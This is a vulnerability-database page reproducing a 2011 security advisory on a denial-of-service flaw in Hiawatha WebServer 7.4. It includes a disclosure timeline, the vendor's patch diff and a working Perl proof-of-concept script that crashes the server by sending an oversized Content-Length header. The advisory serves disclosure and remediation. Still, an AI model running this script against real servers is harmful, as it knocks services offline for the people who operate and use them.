Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hiawatha WebServer 7.4 - Denial of Service

🗓️ 07 Mar 2011 00:00:00Reported by Rodrigo EscobarType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 27 Views

Hiawatha WebServer 7.4 Denial of Service vulnerability and patc

Code
Source: http://packetstormsecurity.org/files/view/99021/DCA-2011-0006.txt

[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]
- Hiawatha WebServer 7.4

[Vendor Product Description]
- Hiawatha is an open source webserver with a focus on security. I
started Hiawatha in January 2002. Before that time, I had used several
webservers, but I didn't like them. They had unlogical, almost cryptic
configuration syntax and none of them gave me a good feeling about
their security and robustness. So, I decided it was time to write my
own webserver. I never thought that my webserver would become what it
is today, but I enjoyed working on it and liked to have my own open
source project. In the years that followed, Hiawatha became a fully
functional webserver.

- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz

[Advisory Timeline]

- 02/24/2011 -> Advisory sent to vendor.
- 02/24/2011 -> Vendor response.
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Content-Length entity-header filed miscalculation.

[Impact]

- Low

[Affected Version]

- 7.4
- Prior versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

- The web server crashes while sending specially crafted HTTP requests
leading to Denial of Service.

[PoC]

# Hiawatha Web Server 7.4
#!/usr/bin/perl
use IO::Socket;
        if (@ARGV < 1) {
                usage();
        }
        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        print "[+] Sending request...\n";
        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "OPTIONS * HTTP/1.1\r\n";
        print $socket "Host: http://www.dclabs.com.br\r\n";
        print $socket "Content-Length: 2147483599\r\n\r\n";
        sleep(3);
        close($socket);
        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

-- hiawatha.c --

-- BEGIN --
20a21
> #include <limits.h>
421c422
<                                                       if
(content_length < 0) {
---
>                                       if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {
-- END --

[Greetz]

DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4
hiawathadenial of servicesecurity patchdclabsvulnerabilitywebserver
27